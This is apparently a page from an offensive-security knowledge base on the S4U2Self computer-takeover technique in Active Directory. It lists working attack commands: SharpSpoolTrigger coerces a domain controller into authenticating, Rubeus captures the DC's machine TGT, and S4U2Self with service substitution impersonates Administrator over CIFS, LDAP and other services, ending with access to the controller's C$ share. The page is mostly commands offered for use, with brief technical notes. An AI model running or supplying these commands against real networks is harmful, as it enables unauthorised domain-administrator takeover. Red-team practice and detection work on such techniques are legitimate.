Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Delegation / Unconstrained

S4U2Self Computer Takeover

If we obtain a computer account TGT, direct access to that same computer can still fail because computer accounts do not automatically become remote local administrators over CIFS. We use S4U2Self with service-name substitution to obtain a usable service ticket as another user to a service running under the computer account.

Monitor and capture the computer TGT

Rubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$
SharpSpoolTrigger.exe dc01.ootw.local delegated-host.ootw.local

Perform S4U2Self with Rubeus

Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.ootw.local /nowrap /ticket:<COMPUTER_TGT_BASE64> /ptt
klist
dir \\dc01.ootw.local\c$

BOF-style flow

krb_dump /luid:3e7 /service:krbtgt
krb_s4u /ticket:<COMPUTER_TGT> /self /altservice:cifs/dc01.ootw.local /impersonateuser:Administrator

Useful alternatives

cifs/dc01.ootw.local
ldap/dc01.ootw.local
host/dc01.ootw.local
http/dc01.ootw.local
wsman/dc01.ootw.local

Notes

/self tells Rubeus not to perform S4U2Proxy. The returned ticket is to the computer account itself for the impersonated user, and altservice rewrites the service name to a useful service class on the same host.

This works when the substituted service runs under the same computer account, because the encrypted part of the ticket is still decryptable by that service account.